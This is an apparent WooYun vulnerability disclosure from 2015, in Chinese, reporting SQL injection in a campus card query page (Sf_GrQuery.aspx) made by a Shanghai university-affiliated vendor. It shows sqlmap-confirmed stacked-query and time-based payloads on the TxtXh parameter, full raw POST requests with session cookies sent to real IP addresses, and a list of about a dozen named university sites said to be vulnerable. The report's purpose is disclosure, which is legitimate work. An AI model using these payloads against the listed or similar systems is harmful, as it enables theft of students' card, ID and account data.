漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0104821
漏洞标题:某查询系统存在注入(泄露卡号,身份证,账号,学号)
相关厂商:上海财大科技发展公司
漏洞作者: 路人甲
提交时间:2015-04-01 10:28
修复时间:2015-07-02 18:36
公开时间:2015-07-02 18:36
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:19
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-01: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向第三方安全合作伙伴开放
2015-05-28: 细节向核心白帽子及相关领域专家公开
2015-06-07: 细节向普通白帽子公开
2015-06-17: 细节向实习白帽子公开
2015-07-02: 细节向公众公开
简要描述:
19
详细说明:
19
漏洞证明:
注入文件:
kfsf/Sf_GrQuery.aspx
卡号,身份证,账号,学号都存在注入
注入参数:
sqlmap identified the following injection points with a total of 1206 HTTP(s) re
quests:
---
Parameter: TxtXh (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKLT
U4NzU1NDUzNQ9kFgICAw9kFgYCAQ8QZGQWAWZkAgMPFgIeBFRleHQFCeWtpuWPt 8mmQCBQ8PFgIfAA
UFMTExMTFkZGQjB 2Q8DS6hrKdWzThSawGyjZtvQ==&RdBtnLstGrCxFs=0&TxtXh=11111'; WAITFO
R DELAY '0:0:5'--&BtnStuLogin=%B2%E9 %D1%AF&__EVENTVALIDATION=/wEWCAL7oN3gDAL
TiJqeCALMiJqeCALNiJqeCALOiJqeCALD57DwBALgguv3AwLlkp oAyTFrd2YS6Nh92D uLPbc9HU qI
e
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKLT
U4NzU1NDUzNQ9kFgICAw9kFgYCAQ8QZGQWAWZkAgMPFgIeBFRleHQFCeWtpuWPt 8mmQCBQ8PFgIfAA
UFMTExMTFkZGQjB 2Q8DS6hrKdWzThSawGyjZtvQ==&RdBtnLstGrCxFs=0&TxtXh=11111' WAITFOR
DELAY '0:0:5'--&BtnStuLogin=%B2%E9 %D1%AF&__EVENTVALIDATION=/wEWCAL7oN3gDALT
iJqeCALMiJqeCALNiJqeCALOiJqeCALD57DwBALgguv3AwLlkp oAyTFrd2YS6Nh92D uLPbc9HU qIe
---
[20:59:15] [INFO] testing Microsoft SQL Server
[20:59:15] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[20:59:29] [INFO] confirming Microsoft SQL Server
[20:59:40] [INFO] the back-end DBMS is Microsoft SQL Server
案例一“:
http://61.142.174.200/cwc/KFweb/kfsf/Sf_GrQuery.aspx
post数据
POST /cwc/KFweb/kfsf/Sf_GrQuery.aspx HTTP/1.1
Host: 61.142.174.200
Proxy-Connection: keep-alive
Content-Length: 381
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://61.142.174.200
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://61.142.174.200/cwc/KFweb/kfsf/Sf_GrQuery.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: __guid=259114573.1608682645667553000.1426391629157.134; ASP.NET_SessionId=4phmk5vvy3e4qf55tfgjy355; count=28
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTU4NzU1NDUzNQ9kFgICAw9kFgYCAQ8QZGQWAWZkAgMPFgIeBFRleHQFCeWtpuWPt%2B%2B8mmQCBQ8PFgIfAAUGMTExMTExZGRkpxiQllzh%2FYxut5OXtPWrDHJfo%2Bc%3D&RdBtnLstGrCxFs=0&TxtXh=111111&BtnStuLogin=%B2%E9++++%D1%AF&__EVENTVALIDATION=%2FwEWCAKG3tbUAwLTiJqeCALMiJqeCALNiJqeCALOiJqeCALD57DwBALgguv3AwLlkp%2BoAxe%2B0GuoF40JmJ0sagddri8ANL2h
案例二:
http://221.5.51.228/cjb//kfsf/Sf_GrQuery.aspx
post数据:
POST /cjb//kfsf/Sf_GrQuery.aspx HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/QVOD, application/QVOD, */*
Referer: http://221.5.51.228/cjb//kfsf/Sf_GrQuery.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 221.5.51.228
Content-Length: 354
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=w4e0ng55sqa4dnuoynsr1b55
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTU4NzU1NDUzNQ9kFgICAw9kFgQCAQ8QZGQWAWZkAgMPFgIeBFRleHQFCeWtpuWPt%2B%2B8mmRkgtuRtJ7nQnBffZaQ1Lxrz1Oonb0%3D&RdBtnLstGrCxFs=0&TxtXh=11111&BtnStuLogin=%B2%E9++++%D1%AF&__EVENTVALIDATION=%2FwEWCAKFvoAHAtOImp4IAsyImp4IAs2Imp4IAs6Imp4IAsPnsPAEAuCC6%2FcDAuWSn6gDAWDe%2B4wBH6FrCgzdjsuk4jn9f9k%3D
更多案例:
http://61.142.174.200/cwc/KFweb/kfsf/Sf_GrQuery.aspx
http://cwc.sxufe.edu.cn/KfWeb/kfsf/Sf_GrQuery.aspx
http://www.shcdkf.com/kfweb/kfsf/Sf_GrQuery.aspx
http://gzcx.tynu.edu.cn/kfweb/kfsf/Sf_GrQuery.aspx
http://cwch.ahu.edu.cn/querynetweb/kfsf/Sf_GrQuery.aspx
http://221.5.51.228/cjb//kfsf/Sf_GrQuery.aspx
http://59.72.128.44/KfWeb//kfsf/Sf_GrQuery.aspx
http://www.cqvie.com/xfcxbn/kfsf/Sf_GrQuery.aspx
http://cycwc.gzife.edu.cn/kefa/kfsf/Sf_GrQuery.aspx
http://210.45.92.21/kfsf/Sf_GrQuery.aspx
http://cwcx.jlsu.edu.cn/kfsf/Sf_GrQuery.aspx
http://cw.syu.edu.cn:8080/kfweb/kfsf/Sf_GrQuery.aspx
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-04-03 18:36
厂商回复:
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。
最新状态:
暂无